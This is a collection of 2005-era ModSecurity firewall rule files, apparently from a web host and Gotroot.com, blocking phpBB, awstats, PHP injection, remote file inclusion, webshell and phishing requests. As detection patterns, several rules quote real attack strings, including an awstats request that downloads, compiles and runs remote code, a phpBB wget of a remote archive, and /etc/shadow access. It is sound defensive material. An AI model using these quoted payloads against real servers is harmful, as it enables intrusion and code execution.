# referer spam common sites
SecFilterSelective "HTTP_REFERER" "(go\.to|get\.to|drop\.to|hey\.to|switch\.to|dive\.to|move\.to|again\.at)"

# phpbb exploits
SecFilterSelective THE_REQUEST "chr(101)%252echr(99)%252echr(104)"
SecFilterSelective THE_REQUEST "chr(99)%252echr(100)%252echr(32)"
SecFilterSelective THE_REQUEST "wget%20www.geocities.com/supahacker/bz.tgz"
SecFilterSelective THE_REQUEST "addnew&install_to=\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./\.\./tmp"

# awstats exploit
SecFilterSelective THE_REQUEST "configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20http%3a%2f%2fawsimple%2etripod%2ecom%2fm%2ftest%2ec%3bgcc%20%2do%20nfsiod%20test%2ec%3b%2e%2fnfsiod%3becho
%20e_exp%3b%2500"
SecFilterSelective THE_REQUEST "configdir=%20%7c"

# Protect against phpBB2 Exploits
SecFilter "viewtopic\.php\?" chain
SecFilter "chr\(([0-9]{1,3})\)" "deny,log"
SecFilterSelective HTTP_USER_AGENT "phpBB2 exploit"

# Exploit phpBB Highlighting Code Execution Attempt
SecFilterSelective THE_REQUEST "&highlight='\.system\("

# Exploit phpBB Highlighting SQL Injection
SecFilterSelective THE_REQUEST "&highlight='\.mysql_query\("

# Exploit phpBB Highlighting Code Execution - Santy.A Worm
SecFilterSelective THE_REQUEST "&highlight='\.fwrite\(fopen\("

# Exploit phpBB Highlight Exploit Attempt
SecFilterSelective ARG_highlight %27

# Common web exploit
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;wget "
SecFilterSelective THE_REQUEST "cmd=cd /tmp; wget "
SecFilterSelective THE_REQUEST "cmd=cd /var/tmp;ls;wget "

#Specific XML-RPC attacks on xmlrpc.php
SecFilterSelective THE_REQUEST "/xmlrpc\.php" chain
SecFilter "\<*xml" chain
SecFilter "(echo( |\(|\').*\;|chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_
kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

# block common phish site URLs
SecFilterSelective THE_REQUEST "aw/eBayISAPI"
SecFilterSelective THE_REQUEST "paypal-login"
SecFilterSelective THE_REQUEST "paypalmembers"
SecFilterSelective THE_REQUEST "paypal.cgi-bin"
SecFilterSelective THE_REQUEST "secure.cgi.paypal.com"
SecFilterSelective THE_REQUEST "wellsfargo.cgi.bin"
SecFilterSelective THE_REQUEST "cgibin-webscr"
SecFilterSelective THE_REQUEST "signin.ebay.com"

# spammer bcc header injections
SecFilterSelective POST_PAYLOAD "bcc:.*@.*"

Include /dh/apache2/template/etc/mod_sec_gotroot_exclude.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_rootkits.conf
Include /dh/apache2/template/etc/mod_sec_gotroot_generic.conf






# http://www.gotroot.com/mod_security+rules
# Gotroot.com ModSecurity rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
# Exclusion Rules
#
# Download from: http://www.gotroot.com/downloads/ftp/mod_security/exclude.conf
# Copyright 2005, all rights reserved.
#
# Commercial redistribution prohibited.
#
# IMPORTANT NOTE!  These rules must be loaded FIRST in your rule orderset to override
# other rules.  If you load them later, they will not work!
#
# Version: N-20050905-01

###########################################
#Generic SQL injection rule exclusions
###########################################

#generic PHP forum posting exclusion
<LocationMatch "/posting.php">
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
</LocationMatch>

#PhpBB posting
<LocationMatch "/index.php?name=PNphpBB2&file=posting&mode=reply.*">
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
</LocationMatch>

#Postnuke uploads
<LocationMatch "/modules.php?op=modload&name=Downloads.*">
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
</LocationMatch>

#Squirrel mail and Horde postings
<LocationMatch "/horde/imp/compose.php">
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
</LocationMatch>

#Phorum posting
<LocationMatch "/phorum/post.php">
SecFilterSelective POST_PAYLOAD "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
</LocationMatch>

<LocationMatch "/tiki-editpage.php">
SecFilterSelective POST_PAYLOAD "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
</LocationMatch>

<LocationMatch "/misc.php">
SecFilter "[[:space:]]+(select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]" pass,nolog
</LocationMatch>


###########################################
#Double pipe exclusion rules
###########################################
<LocationMatch "/_vti_bin/fpcount.exe">
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|" pass,nolog
</LocationMatch>

###########################################
#Front page exclusions
###########################################
<LocationMatch "/_vti_bin/_vti_aut/author.exe">
  SecFilterInheritance Off
</LocationMatch>
















# http://www.gotroot.com/mod_security+rules
# Gotroot.com ModSecurity rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
# Application Security Rules
#
# Download from: http://www.gotroot.com/downloads/ftp/mod_security/rules.conf
# Copyright 2005, all rights reserved.
#
# Commercial redistribution prohibited.
#
# Version: N-20051120-01

#--------------------------------
# notes
#--------------------------------

#--------------------------------
#start rules
#--------------------------------
#Enforce proper HTTP requests
SecFilterSelective THE_REQUEST "!HTTP\/(0\.9|1\.0|1\.1)$"

# Only accept request encodings we know how to handle
# we exclude GET requests from this because some (automated)
# clients supply "text/html" as Content-Type
# DreamHost added REPORT for subversion on Apache 2 only
SecFilterSelective REQUEST_METHOD "!^(GET|HEAD|POST|PUT|PROPFIND|OPTIONS|LOCK|REPORT)$" chain
SecFilterSelective HTTP_Content-Type "!(^$|^application/x-www-form-urlencoded$|^multipart/form-data)"

# Require Content-Length to be provided with
# every POST request
SecFilterSelective REQUEST_METHOD "^POST$" chain
SecFilterSelective HTTP_Content-Length "^$"

# Don't accept transfer encodings we know we don't handle
# (and you don't need it anyway)
SecFilterSelective HTTP_Transfer-Encoding "!^$"

#XSS insertion into Content-Type
SecFilterSelective THE_REQUEST "Content-Type\:.*(<[[:space:]]*(script|about|applet|activex|chrome)*>.*(script|about|applet|activex|chrome)[[:space:]]*>|onmouseover=|javascript\:)"

#Don't accept chunked encodings
#modsecurity can not look at these, so this is a hole
#that can bypass your rules, the rule before this one
#should cover this, but hey paranoia is cheap
SecFilterSelective HTTP_Transfer-Encoding "chunked"

#Web Proxy GET Request
SecFilter "^GET (http|https|ftp)\:/"

#Web Proxy HEAD Request
SecFilter "^HEAD (http|https|ftp)\:/"

#Proxy POST Request
SecFilter "^POST (http|https|ftp)\:/"

#Generic PHP exploit signatures
SecFilterSelective THE_REQUEST "\;(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
#slightly tighter rules with narrower focus
SecFilterSelective REQUEST_URI "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"
SecFilterSelective POST_PAYLOAD "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)\(.*\)\;"

#prevent PHP error leakage
SecFilterSelective OUTPUT "Fatal error:"

#generic XSS PHP attack types
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "javascript\:/(.*new\x20ActiveXObject.*Sh\.regwrite|.*window\.opener\.document\.body.\innerHTML=window\.opener\.document\.body\.innerHTML\.replace)"

#Prevent SQL injection in cookies
SecFilterSelective COOKIE_VALUES "((select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]+[[:space:]]+(from|into|table|database|index|view)[[:space:]]+[A-Z|a-z|0-9|\*| |\,]|UNION SELECT.*\'.*\'.*,[0-9].*INTO.*FROM)"

#Generic command line attack filter
SecFilterSelective THE_REQUEST "\|+.*[\x20].*[\x20].*\|"

#PHP Injection Attack generic signature
SecFilterSelective THE_REQUEST  "\.php*" chain
SecFilter "(\?((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|path|pathtoroot|pagina|path|include_location|root|page|gorumDir|site|pun_root|open|seite)=(http|https|ftp)\:/|(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |id|cmd|pwd|wget |uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./|whoami|killall |rm \-[a-z|A-Z]))"
SecFilterSelective THE_REQUEST  "\.php\?(((LOCAL|INCLUDE|PEAR|SQUIZLIB)_PATH|action|content|dir|name|menu|pm_path|pagina|path|pathtoroot|include_location|gorumDir|root|page|site|pun_root|open|seite)=(http|https|ftp)\:/|.*(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z]))"

#Generic PHP remote file inclusion attack signature
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"
SecFilterSelective THE_REQUEST "\.php\?" chain
SecFilter "(http|https|ftp)\:/" chain
SecFilter "(cmd|command)=.*(cd|\;|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname|cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"

#Genenric PHP body attack
SecFilterSelective THE_REQUEST "(chr|fwrite|fopen|system|echr|passthru|popen|proc_open|shell_exec|exec|proc_nice|proc_terminate|proc_get_status|proc_close|pfsockopen|leak|apache_child_terminate|posix_kill|posix_mkfifo|posix_setpgid|posix_setsid|posix_setuid|phpinfo)" chain
SecFilterSelective POST_PAYLOAD "^PHP\:*((cd|mkdir)[[:space:]]+(/|[A-Z|a-z|0-9]|\.)*|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat)|rexec |smbclient |t?ftp |ncftp |chmod |curl |telnet |gcc |cc |g\+\+ |whoami|\./|killall |rm \-[a-z|A-Z])"

#script, perl, etc. code in HTTP_Referer string
SecFilterSelective HTTP_Referer "\#\!.*/"

#generic command line attack
SecFilterSelective THE_REQUEST "\|*id\;echo*\|"
SecFilterSelective ARGS "\|*id\;echo*\|"

#remote file inclusion generic attack signature
SecFilterSelective THE_REQUEST  "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?" chain
SecFilter "((name|pm_path|pagina|path|include_location|root|page|open)=(http|https|ftp)|(cmd|command|inc)=)"
SecFilterSelective THE_REQUEST  "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|command|inc|name)="
SecFilterSelective ARGS  "\.(dat|gif|jpg|png|bmp|txt|vir|dot)" chain
SecFilter "\?\&(cmd|inc|name)="
SecFilterSelective ARGS  "\.(dat|gif|jpg|png|bmp|txt|vir|dot)\?\&(cmd|inc|name)="
SecFilterSelective REQUEST_URI  "\.php\?.*=(http|https|ftp)\:/.*\?&cmd="

#Bogus file extensions generic signature
SecFilterSelective THE_REQUEST  "[A-Za-z0-9]\.(gif|jpg|png|bmp)\.txt"

#PHP remote path attach generic signature
SecFilterSelective REQUEST_URI  "\.ph(p(3|4)?).*path=(http|https|ftp)\:/"
SecFilterSelective REQUEST_URI  "\.php.*path=(http|https|ftp)\:/"

#generic attack sig
SecFilterSelective THE_REQUEST "cd\x20*\;(cd|\;|echo|perl |python |rpm |yum |apt-get |emerge |lynx |links |mkdir |elinks |cmd|pwd|wget |id|uname |cvs |svn |(s|r)(cp|sh) |net(stat|cat) |rexec |smbclient |t?ftp |ncftp |curl |telnet |gcc |cc |g\+\+ |\./)"

# WEB-ATTACKS uname -a command attempt
SecFilterSelective THE_REQUEST "uname" chain
SecFilter "\x20-a"

#generic php attack sigs
SecFilterSelective REQUEST_URI "&(cmd|command)=(id|uname)\x20"
SecFilterSelective REQUEST_URI "cmd\?(cmd|command)="
SecFilterSelective REQUEST_URI "(spy|cmd|cmd_out|sh)\.(gif|jpg|png|bmp|txt)\?&(cmd|command)="
SecFilterSelective REQUEST_URI "\.php\?&(cmd|command)="

#Generic PHP attack sig
SecFilterSelective THE_REQUEST "system\(getenv\(HTTP_PHP\)\)"


# WEB-ATTACKS /etc/shadow access
SecFilterSelective THE_REQUEST "/etc/shadow"

#remote bash shell
SecFilterSelective THE_REQUEST "/shell\.php\&cmd="
SecFilterSelective ARGS "/shell\.php\&cmd="

#Generic PHP payload command injection and upload vulnerabilities
SecFilterSelective POST_PAYLOAD "<\?php" chain
SecFilter  "((fputs|fread)\(.*\,.*\)\;|fsockopen\(gethostbyname|chr\(.*\)\.chr\(.*\)\.chr\(|(fclose|fgets)\(.*\)\;|(system|exec)\(.*\)\;)" chain
SecFilter "\<\?php"












#http://www.gotroot.com/mod_security+rules
#
# Created by The Prometheus Group (http://www.prometheus-group.com)
#
#Known rootkit, remote toolkit, etc. signature
#
#Download from: http://www.gotroot.com/downloads/ftp/mod_security/rootkits.conf
#copyright 2005, all rights reserved
#
# Commercial redistribution prohibited.
#
#Version: N-20051120-01
#
#http://www.gotroot.com
#see website for more information

SecFilterSelective THE_REQUEST "/cse\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/terminatorX-exp.*\.(gif|jpg|txt|bmp|php)\?"
SecFilterSelective THE_REQUEST "/\.it/viewde"
SecFilterSelective THE_REQUEST "/cmd\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/cmd\.php\.ns\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/cmd\.dat\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/sep\.txt\?&(command|cmd)="
SecFilterSelective THE_REQUEST "/s\.txt\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/pro18\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/shell\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/bash\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(o|0|p)wn(e|3)d\.(gif|jpg|txt|bmp)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/get\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/root\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/spy\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/nmap\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/asc\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/lila\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/sh\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/new(cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/(cmd|command)[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/[a-z](cmd|command)\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/[a-z](cmd|command)[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/ijoo\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/oinc\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/a\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST "/gif\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/jpg\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/ion\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/lala\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/phpshell\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12][05]\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12]\.ph(p(3|4)?|tml)\?"
SecFilterSelective THE_REQUEST "/tool[12][0-9]\.js"
SecFilterSelective THE_REQUEST "/tool25\.js"

#Known rootkits
SecFilterSelective THE_REQUEST "perl xpl\.pl"
SecFilterSelective THE_REQUEST "perl kut"
SecFilterSelective THE_REQUEST "perl viewde"
SecFilterSelective THE_REQUEST "perl httpd\.txt"
SecFilterSelective THE_REQUEST "\./xkernel\;"
SecFilterSelective THE_REQUEST "/kaiten\.c"
SecFilterSelective THE_REQUEST "/mampus\?&(cmd|command)"


#Known rootkit Defacing Tool 2.0
SecFilterSelective THE_REQUEST "/tool(12)[0-9]\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool25\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/tool(12)\.(d(ao)t|gif|jpg|bmp|txt)\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/therules25\.(d(ao)t|gif|jpg|bmp|txt)\?(cmd|command)="
SecFilterSelective THE_REQUEST "/tool25\.jpg\?"
SecFilterSelective THE_REQUEST "/tool25\.dat\?"

#other known tools
SecFilterSelective THE_REQUEST "/xpl\.php\?&(cmd|command)="
SecFilterSelective THE_REQUEST "/ssh\.php"
SecFilterSelective THE_REQUEST "/ssh2\.php"
SecFilterSelective THE_REQUEST "/sfdg2\.php"

#New kit
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)(\;|\w)"
SecFilterSelective THE_REQUEST "/\.dump/(bash|httpd)\.(txt|php|gif|jpg|dat|bmp|png)(\;|\w)"

#new kir
SecFilterSelective THE_REQUEST "/dblib\.php\?&(cmd|command)="

#suntzu
SecFilterSelective THE_REQUEST "/suntzu\.php\?cmd="

#proxysx.gif?
SecFilterSelective THE_REQUEST "/proxysx\.(gif|jpg|bmp|txt)\?"

#phpbackdoor
SecFilterSelective THE_REQUEST "/phpbackdoor\.php\?cmd="
SecFilterSelective THE_REQUEST "/phpbackdoor.*\.php\?cmd="

#new unknown kit
SecFilterSelective REQUEST_URI "/oops?&"

# known PHP attack shells
#value of these sigs, pretty low, but here to catch
# any lose threads, honeypoting, etc.
SecFilterSelective THE_REQUEST   "/img/wiki_up/.*\.(php(3|4)?|tml|cgi|sh)"
SecFilterSelective THE_REQUEST   "wiki_up/gif\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "wiki_up/ion\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "wiki_up/jpg\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "wiki_up/lala\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "wiki_up/.*\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "/phpshell\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "/tool20\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "/tool20\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "/temp/gif\.ph(p(3|4)?|tml)"
SecFilterSelective THE_REQUEST   "/temp/lala\.ph(p(3|4)?|tml)"
SecFilterSelective REQUEST_URI   "/phpterm"

#new unknown kits
SecFilterSelective THE_REQUEST   "/iblis\.htm\?"
SecFilterSelective THE_REQUEST   "/gif\.gif\?"
SecFilterSelective THE_REQUEST   "/go\.php\.txt\?"
SecFilterSelective THE_REQUEST   "/sh[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST   "/iys\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST   "/shell[0-9]\.(gif|jpg|txt|bmp)\?"
SecFilterSelective THE_REQUEST   "/zehir\.asp"
SecFilterSelective THE_REQUEST   "/aflast\.txt\?"
SecFilterSelective THE_REQUEST   "/sikat\.txt\?&cmd"
SecFilterSelective THE_REQUEST   "/t\.gif\?"
SecFilterSelective THE_REQUEST   "/phpbb_patch\?&"
SecFilterSelective THE_REQUEST   "/phpbb2_patch\?&"
SecFilterSelective THE_REQUEST   "/lukka\?&"